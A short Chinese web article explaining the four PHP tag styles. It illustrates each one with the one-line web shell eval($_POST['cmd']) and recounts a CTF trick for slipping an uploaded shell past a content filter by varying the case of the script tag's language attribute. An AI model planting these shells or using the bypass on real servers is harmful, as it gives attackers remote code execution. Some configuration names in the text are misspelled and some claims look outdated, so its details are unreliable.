PHP的标识有哪些?这个问题可能是我们日常工作经遇见到的。通过这个问题,希望你能收获更多。如果你不看答案,不知道是否有把握回答这个问题?让我们来试试。
PHP四种标记风格
1.XML风格
<?php eval($_POST['cmd']); ?>
php推荐使用的标记风格。
服务器管理员无法禁用,所有服务器上均可使用该风格。
2.脚本风格
<script language="php"> eval($_POST['cmd']); </script>
默认开启,无法禁用
笔者曾遇到过一CTF题目,要求上传shell,但是却对文件内容做了过滤 ,<? 以及 php,替换为了空格。此种风格中,language的值,大小写都可以,因此可以构造如下代码进行绕过
<script language="PhP"> eval($_POST['cmd']); </script>
3.简短风格
<? eval($_POST['cmd']); ?>
此种风格需要在配置文件php.ini中启用short_open_tage选项
此种风格在许多环境中默认是不支持的
4.ASP风格
<% eval($_POST['cmd']); %>
此种风格需要在配置文件php.ini中启用asp_tag选项
在默认情况下是禁用的
看完上述内容,你们对php的标识大概了解了吗?如果想了解更多相关文章内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。